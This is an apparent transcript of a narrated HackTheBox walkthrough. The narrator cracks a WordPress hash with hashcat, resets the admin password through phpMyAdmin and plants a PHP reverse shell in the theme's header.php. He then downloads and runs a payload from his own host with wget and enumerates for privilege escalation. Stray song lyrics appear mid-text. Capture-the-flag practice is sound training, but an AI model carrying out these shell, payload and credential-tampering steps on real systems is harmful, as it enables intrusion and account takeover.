there. Yeah, there it is. Oh, it's in leaked databases. Okay. So, hashcat. Still running. Let's do it with the power of WSL. Hashcat A 0 M400 notch.hash and then WinHome documents secondless passwords leaked databases rocku.txt. On your way. So this one's done 419,000, whereas the WSL one has already done 442,000. So a little bit of a different speed situation here. I keep doing Alt-Tab wrong. And it's just kind of how this goes, right? Password cracking. And the idea is once we have this, we'll be able to log into the WordPress interface. Yeah, definitely. So Hashcat is, you know, it's a good time. I prefer it most of the time to John the Ripper. I feel like its interface is saner. And, yeah, sometimes you gotta crack passwords. And, you know, the art of creating good word lists for passwords is something that I'm still, you know, learning. It's not, you know, throwing rock you at everything is not always going to work. Unless, I should say, unless you have a large enough word list. Then it absolutely will. Given a large enough users, set of users, it will absolutely find somebody who has a bad password. That's assuming that the target has a bad password policy. Alright, well, we're still powering through here. You can see how much faster this is going. Yeah, so time to run it, right? And that's really all about your computing power. Now, the reason why it's going so much faster on WSL is because it's got I believe it's taking direct advantage of my GPU, which it can't do in the Hyper-V VM on the Kali virtual machine. And that's just why it's ripping through this. But yeah, that's why people come up build like Hashcat rigs just to do this. Now, I didn't throw this at CrackStation because generally speaking, you know, WordPress should have salt, and I mean, we can try it. It doesn't look like there's a lot of salt there, so we can try it against CrackStation, but I don't think we're gonna get lucky there. In fact, I might as well just quit this because it's going so slow. It might be worth it to Google the hash. It certainly won't hurt. Ugh, what's with these pictures? And again, we run up into the problem with the Brave browser, where it's sometimes unrecognized hash format. Let's give it the whole thing, I guess. Running around like dollars in the wind. Bending over backwards just to let you in. Yeah. I told you that one day ain't never enough. You tell me I hate you, I still call you up. If we don't got trust, we can never have love. I was putting in the hours. Yeah, doesn't like doing that. The problem with Googling the hash is that I'm pretty sure that we're gonna get the answer to the Hashcat. Yeah, see? We're getting the write-ups for HackTheBox, which I don't want to see. That defeats the purpose. I want to actually see if we can get it. But maybe in the interest of time, you know? Yeah, so it's Star Wars, which sucks. Oh no, that's just the latest successful MD5 reverses. That's actually not. That's not this thing. But this one would be. Disappointing. I know for a fact this gets it. This takes a while. We know this. Oh, wait. That's... You know what? I'm being an idiot. We don't have to crack this password. We have access to PHPMyAdmin. I was so focused on cracking the password. We can... We can make our own credential. And what the write-up was talking about here is that what we can do is basically... I closed it, but what we can do is we'll just, because we know it's an MD5 hash, we're just gonna send that in to MD5 sum and turn that into our password. Or just change it. I don't even have to copy it. I can just change the one that's there. One of the reasons why I don't think that I was focusing on doing that is because it's destructive, right? It's not very stealthy to change somebody's password and log in as them. They'll notice. But we'll do it. So we'll edit this one. And we'll change the password to... I don't really care. All right. Now, let's log into this thing. Yeah, I'm pretty sure I have to do the right format, though. With the P. Because it's still... Oh dear. Yeah, I don't know though. It should say, because all right, what type of passwords does WordPress use for hashes? Oh, handy. All right, now we've got ourselves a valid WordPress password hash, so let's go and get it. So we'll edit this guy, change this up, and we're in. Exciting. And now, to give ourselves a reverse shell. So again, I just out of curiosity. Ah, it didn't crack it in Hashcat. Bummer. Oh well, we're in. So now the next thing we want to do is get ourselves a reverse shell. So, coming over to our Metasploit framework, we're going to use exploit multi-handler again. I'm going to change up this song because it sucks. Let's see. Options. Whoa. Okay. Let's set the L port to 8888. And we're going to change the payload to PHP interpreter reverse TCP. And we'll just set that up. Over here in HackTheBox, in my folder here, I'm going to use MSFN. And pretty much everything's set in my options, thank you fish, except that I have to change the IP from the try hack me IP to my HackTheBox IP. Now, this is a lot, and if we wanted to be a little bit cleaner about it, and as a matter of fact, let's start there. My handy dandy hack tool has reverse shell generators, and I'm going to put in my information. And here comes Pentest Monkey's reverse shell, which I can absolutely do. So we're going to copy this PHP, and we're going to modify the header.php file in the theme. And we're just going to put it right on top. Because it closes itself anyway, so we don't need to worry about it messing with anything else. Now, this is not a interpreter shell, so we're going to actually just fire it off on netcat. before, rather than using Metasploit. So, oh, I gotta kill. I gotta kill the. Listening job before I can use that port. So this would be like OSCP appropriate because I'm not using Metasploit at all. Except for MSF Venom, which they're totally fine with. No, I'm not even using that because we're not using that payload. Okay, so we're going to update this file. And then we're just going to go in a new tab to our website. And look, we got our shell. Okay, let's get ourselves a better shell. Okay, there's Python 3, so we're going to do Python 3 import pty.spawn bin bash. Yes. Okay. Who am I? I'm www.data. I've learned my lesson that even when I'm data, I'm going to run sudo-l. I don't have the sudo password, so that's not going to work. That killed my shell because I'm dumb. Let's revisit it. Okay. Let's rerun this Python command. Okay. Let's go home. Okay, I can at least get the user.txt here. No, I can't. This is another situation which I'm going to have to get system the hard way. Fun. Can I read anything? Okay. What's this start.sh all about? Sponge.jar. Let's cat the user cache, your username cache.json. Nothing. Let's go into config. Okay, let's go to sponge. At global.conf. We're just enumerating just to see if there's anything in here that's handy. This is all Minecrafty stuff, I think. I don't think we're gonna get anything fun here, unfortunately. Let's see. Let's nu votifier at nu votifier config.yaml. Port to listen on for new votes. Port 8192. It's listening locally. Enable external true. Token. Interesting. So let's see that start.sh again. Screen runs BlockyCraft and then Java with certain options, and it gives it a jar of sponge.jar no GUI. Okay. Nothing interesting in cron. Okay, let's go to the web folder, just in case we missed something there. So we know that there was a wiki, right? Nothing interesting in there. We thought we saw everything in plugins, but let's look and be careful. Whoa, scan.php. What's this? This function scans the file folders recursively and builds a large array. Is there actually such a folder file? Recursively get the contents of the folder. Okay, interesting. So that actually is what's listing the stuff, right? Yeah, there's the stuff. Okay. All right. Nothing super fun here just yet. What else do I want to do? I need to enumerate for SUID. So to do that, I'm going to find at the root perm of 4000 and send things to dev null to see if anything has the SUID root bit set or anything interesting. Doesn't look like it. Okay. Nothing really fun in there. No SSH or anything usable. All right. Not NC, netstat. I want to see what's listening. So there is something listening on 8192. Now, can I hit it externally? Because I didn't catch it with RustScan. No. But let's try it here. Yeah, killed my shell again. I gotta get a better shell. This is driving me crazy. So to do that, I'm gonna upload a proper reverse shell. Okay. And we're gonna Python 3 and http.server. Okay. And then, so I'm serving up that file, and I'm going to go get it with wget http 10.10.14. Whoa. 14.7 8000 MT. Cool. chmod plus x and t. And let's set up the listener over here. Oh, sorry. So I missed the question. What is sudo as admin successful in Notch's home directory? It is an unreadable directory of every time Notch has run sudo successfully. But because I don't have permissions to read it, it's less than useful for me at the moment. I'm sending the payload to Linux x64 interpreter. Okay. Oops. Set L port 8889 J, and over in HackTheBox, let's run it. Got the session. We're going to do the same thing we did before with Python just to get the good shell. Import pty.spawn bin bash. Oops. Good. Okay, so now I have a nice stable shell here. It's a little bit easier for me to work with. C home Notch. Actually, it looks like everybody else can read it. Let's see what's in there. Doesn't look like there's anything in there given the file size.